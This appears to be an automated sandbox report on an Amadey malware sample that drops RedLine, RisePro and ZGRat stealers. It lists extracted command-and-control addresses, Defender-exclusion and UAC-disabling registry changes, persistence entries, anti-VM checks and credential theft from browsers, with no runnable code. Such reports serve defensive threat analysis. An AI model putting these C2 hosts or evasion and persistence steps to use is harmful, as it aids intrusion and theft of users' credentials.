amadey | 6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e

Analysis

max time kernel
43s
max time network
102s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
06-05-2024 11:56

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe
Size

1.5MB
MD5

f8e41ae0a657749328279326389e54a2
SHA1

b1808615e111e7c290af92763d4a7039e63dd461
SHA256

6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e
SHA512

e5a131e1f65b20b918d967610cba91cc2d8b5db98b8a154dec4c98040e3c6314b7b06ab5635414a161ff8311e84a1c384c827dccc6c3daf80f43dfa23ff5b222
SSDEEP

49152:U6J/tmircuwdgG76N8IQaOQSimj0BLx72Km58:Uutmisdg9GI6QSimKLVm58

Score

10^/10

amadey privateloader redline risepro zgrat @cloudytteam test1234 discovery evasion execution infostealer loader persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.93:58709

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral2/memory/1688-450-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral2/files/0x001900000002ab66-461.dat	family_zgrat_v1
behavioral2/memory/5212-476-0x0000000000B90000-0x0000000000C50000-memory.dmp	family_zgrat_v1
behavioral2/memory/3296-1099-0x0000026FCAF10000-0x0000026FCE808000-memory.dmp	family_zgrat_v1
behavioral2/memory/3296-1117-0x0000026FE9080000-0x0000026FE90A4000-memory.dmp	family_zgrat_v1
behavioral2/memory/3296-1109-0x0000026FE8F60000-0x0000026FE9070000-memory.dmp	family_zgrat_v1

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	ZX5vUkJZlFifafkY46SOBxVX.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral2/files/0x001b00000002ab2a-162.dat	family_redline
behavioral2/memory/5036-176-0x00000000000E0000-0x0000000000132000-memory.dmp	family_redline
behavioral2/files/0x001900000002ab65-460.dat	family_redline
behavioral2/files/0x001900000002ab66-461.dat	family_redline
behavioral2/memory/5272-473-0x0000000000760000-0x00000000007B2000-memory.dmp	family_redline
behavioral2/memory/5212-476-0x0000000000B90000-0x0000000000C50000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	ZX5vUkJZlFifafkY46SOBxVX.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7ad92a0bdc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ZX5vUkJZlFifafkY46SOBxVX.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
90	5984	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1952	powershell.exe
6072	powershell.exe
652	powershell.exe
4320	powershell.exe
5580	powershell.exe
4260	powershell.exe
5640	powershell.exe
5732	powershell.exe
5416	powershell.exe
7100	powershell.exe
2260	powershell.exe
5876	powershell.exe
768	powershell.exe
6500	powershell.exe
5332	powershell.exe
4260	powershell.exe
2384	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5736	netsh.exe
4784	netsh.exe
5420	netsh.exe
2772	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7ad92a0bdc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7ad92a0bdc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ZX5vUkJZlFifafkY46SOBxVX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ZX5vUkJZlFifafkY46SOBxVX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EfsfwL1fHDS1GUt9FZ4p337c.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nVsU7k50F4AAHgffUVaCFRD1.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GesA2bvLlNw0Tem5OqBkYe2x.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MJemVCDQtLqTACPHMtQCsAEY.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\crLsQdXSUFTGy6Jj1Y53uK8M.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dTKyYc0EY0FDjygwnpDvFx3S.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vxnZFB76U56d9jMWx4kLvQFK.bat	regasm.exe

Executes dropped EXE 28 IoCs

pid	Process
3620	explorta.exe
2616	explorta.exe
4868	explorta.exe
4348	amert.exe
4840	explorha.exe
2784	7ad92a0bdc.exe
5100	swiiiii.exe
5036	jok.exe
2372	bcb8ba0b64.exe
1180	swiiii.exe
3492	file300un.exe
3920	gold.exe
2184	XMhZgF79lMDTbVO6UFYlFLlT.exe
664	uZoEwqzalxW277e1FwIzuepd.exe
2960	XObYPJVnfZkA98Rj19ulAF4V.exe
552	8Ku8RT30AG6wuz4ms5wfV4v4.exe
3372	4vS2xD4fZskADp3QIps2U7bX.exe
1004	alexxxxxxxx.exe
4152	u1oo.0.exe
5212	trf.exe
5272	keks.exe
5612	install.exe
5788	u1oo.1.exe
2516	GameService.exe
5604	ZX5vUkJZlFifafkY46SOBxVX.exe
5648	NewB.exe
5724	GameService.exe
1804	ISetup8.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Wine	explorha.exe

Loads dropped DLL 2 IoCs

pid	Process
5952	rundll32.exe
5984	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 46 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/4124-0-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/memory/4124-2-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/memory/4124-7-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/memory/4124-6-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/memory/4124-4-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/memory/4124-3-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/memory/4124-5-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/memory/4124-1-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/files/0x001900000002ab14-13.dat	themida
behavioral2/memory/3620-24-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/3620-23-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/3620-27-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/3620-26-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/3620-25-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/3620-28-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/3620-22-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/3620-21-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/4124-20-0x0000000000B70000-0x000000000105B000-memory.dmp	themida
behavioral2/memory/2616-33-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/2616-34-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/2616-35-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/2616-37-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/2616-36-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/2616-38-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/2616-32-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/2616-39-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/2616-41-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/4868-46-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/3620-90-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/files/0x001900000002ab1c-111.dat	themida
behavioral2/memory/2784-128-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/2784-129-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/2784-130-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/2784-133-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/2784-132-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/2784-131-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/2784-127-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/2784-126-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/2784-125-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/3620-562-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/files/0x001900000002ab8c-606.dat	themida
behavioral2/memory/5604-619-0x0000000140000000-0x0000000140862000-memory.dmp	themida
behavioral2/memory/2784-1074-0x0000000000820000-0x0000000000EA2000-memory.dmp	themida
behavioral2/memory/6308-1089-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/6308-1104-0x0000000000D70000-0x000000000125B000-memory.dmp	themida
behavioral2/memory/5604-1162-0x0000000140000000-0x0000000140862000-memory.dmp	themida

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	ZX5vUkJZlFifafkY46SOBxVX.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Windows\CurrentVersion\Run\7ad92a0bdc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\7ad92a0bdc.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Windows\CurrentVersion\Run\bcb8ba0b64.exe = "C:\\Users\\Admin\\1000021002\\bcb8ba0b64.exe"	explorta.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ZX5vUkJZlFifafkY46SOBxVX.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7ad92a0bdc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	pastebin.com
47	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
66	ipinfo.io
83	api.myip.com
93	api.myip.com
95	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x001900000002ab23-199.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	ZX5vUkJZlFifafkY46SOBxVX.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	ZX5vUkJZlFifafkY46SOBxVX.exe
File opened for modification	C:\Windows\System32\GroupPolicy	ZX5vUkJZlFifafkY46SOBxVX.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	ZX5vUkJZlFifafkY46SOBxVX.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4868	explorta.exe
4348	amert.exe
4840	explorha.exe
5604	ZX5vUkJZlFifafkY46SOBxVX.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3620 set thread context of 4868	3620	explorta.exe	81
PID 5100 set thread context of 1520	5100	swiiiii.exe	88
PID 1180 set thread context of 5072	1180	swiiii.exe	101
PID 3492 set thread context of 1632	3492	file300un.exe	112
PID 3920 set thread context of 1108	3920	gold.exe	117
PID 1004 set thread context of 1688	1004	alexxxxxxxx.exe	125

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorta.job	6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe
File created	C:\Windows\Tasks\explorha.job	amert.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5584	sc.exe
2944	sc.exe
3636	sc.exe
5380	sc.exe
2816	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2772	5100	WerFault.exe	86
4740	1004	WerFault.exe	124
2236	4152	WerFault.exe	126
6416	5984	WerFault.exe	186

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1oo.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1oo.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1oo.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1oo.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1oo.0.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5904	schtasks.exe
5244	schtasks.exe
4068	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4868	explorta.exe
4868	explorta.exe
4348	amert.exe
4348	amert.exe
4840	explorha.exe
4840	explorha.exe
3784	chrome.exe
3784	chrome.exe
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
5984	rundll32.exe
5984	rundll32.exe
5984	rundll32.exe
5984	rundll32.exe
5984	rundll32.exe
5984	rundll32.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
4152	u1oo.0.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe
5036	jok.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
3784	chrome.exe
3784	chrome.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	3492	file300un.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeDebugPrivilege	1632	regasm.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeDebugPrivilege	5212	trf.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeDebugPrivilege	5036	jok.exe
Token: SeBackupPrivilege	5212	trf.exe
Token: SeSecurityPrivilege	5212	trf.exe
Token: SeSecurityPrivilege	5212	trf.exe
Token: SeSecurityPrivilege	5212	trf.exe
Token: SeSecurityPrivilege	5212	trf.exe
Token: SeDebugPrivilege	5640	powershell.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
